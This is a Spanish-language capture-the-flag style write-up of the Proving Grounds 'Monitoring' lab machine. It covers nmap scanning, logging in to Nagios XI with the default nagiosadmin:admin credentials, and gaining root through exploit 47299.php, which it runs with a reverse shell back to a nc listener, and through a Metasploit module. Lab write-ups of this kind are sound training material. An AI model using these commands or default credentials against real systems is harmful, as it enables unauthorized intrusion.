🟢Monitoring

Write-up de la máquina Monitoring de Proving Grounds #writeup #walkthrough

Enumeración

NMAP

Comenzamos como siempre enumerando de forma rápida los servicios que tiene abiertos el objetivo.

nmap -p- -vvv --open --min-rate 2000 -Pn -n 192.168.76.136

Están abiertos los puertos 22, 25, 80, 389, 443 y 5667. El siguiente paso será el escaneo profundo de estos servicios abiertos.

 -nmap -p22,25,80,389,443,5667 -Pn -n -sVC 192.168.76.136

Existen 6 puertos abiertos en el equipo target.

  • Puerto 22 -> SSH -> OpenSSH 7.2

  • Puerto 25 -> SMTP -> Postfix

  • Puerto 80 -> HTTP -> Apache httpd 2.4.18

  • Puerto 389 -> LDAP -> OpenLDAP 2.2.X - 2.3.X

  • Puerto 443 -> HTTPS -> Apache httpd 2.4.18

  • Puerto 5667 -> ?

Además de una versión que puede ser interesante más adelante, Nagios XI.

Enumeración Web

Tenemos abiertos los puertos 80 y 443, así que comenzamos viendo el contenido.

Puerto 80

Se está ejecutando un servicio Nagios XI en el puerto 80. Revisando el código fuente no encontramos nada interesante. Pulsamos en "Acess Nagios XI" y se nos redirige a un inicio de sesión.

Probaremos algunas credenciales por defecto comunes admin:admin, admin:password... pero no obtenemos acceso. Vamos a buscar en Google las credenciales de inicio de sesión por defecto para Nagios y encontramos que el username por defecto es "nagiosadmin" y vamos a probar "admin" como contraseña. Tenemos credenciales para iniciar sesión en Nagios XI, "nagiosadmin:admin".

Vamos a enumerar los directorios disponibles, para lo cual utilizaremos dirsearch.

dirsearch -u "http://192.168.76.136" -i200,301 

No hay anda interesante.

Vamos a buscar vulnerabilidades para Nagios XI. Utilizaremos searchsploit.

Sabemos que la versión de Nagios es la 5.6.0

Explotación

Explotación manual

Descargamos el exploit para ver si se adapta a nuestras necesidades.

searchsploit -m 47299.php

Vemos como debemos ejecutarlo.

Nota: Debemos instalar "php dom"

sudo apt-get install php-dom

Una vez instalado "php dom" ejecutamos el exploit como se indicaba anteriormente y por otro lado, colocaremos un oyente nc en el puerto 4444.

php 47299.php --host=192.168.76.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.76 --reverseport=4444
Shell

Ya tenemos conexión con la máquina objetivo, además de privilegios máximos. Vamos a buscar en este caso la única flag existente, proof.txt.

Flag proof.txt

Ya tendríamos la máquina acabada.

Explotación vía Metasploit

Una vez hemos realizado la exploit vía "manual", vamos a realizar la vulneración utilizando Metasploit. Vamos a ello.

use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce

Configuramos el exploit.

Y ejecutamos.

Y ya volveriamos a tener conexión con la máquina objetivo. Solo quedaría volver a buscar la flag proof.txt.

Y tendríamos acabada la máquina, esta vez de manera automatiza utilizando un exploit de la herramienta Metasploit.

Last updated

Was this helpful?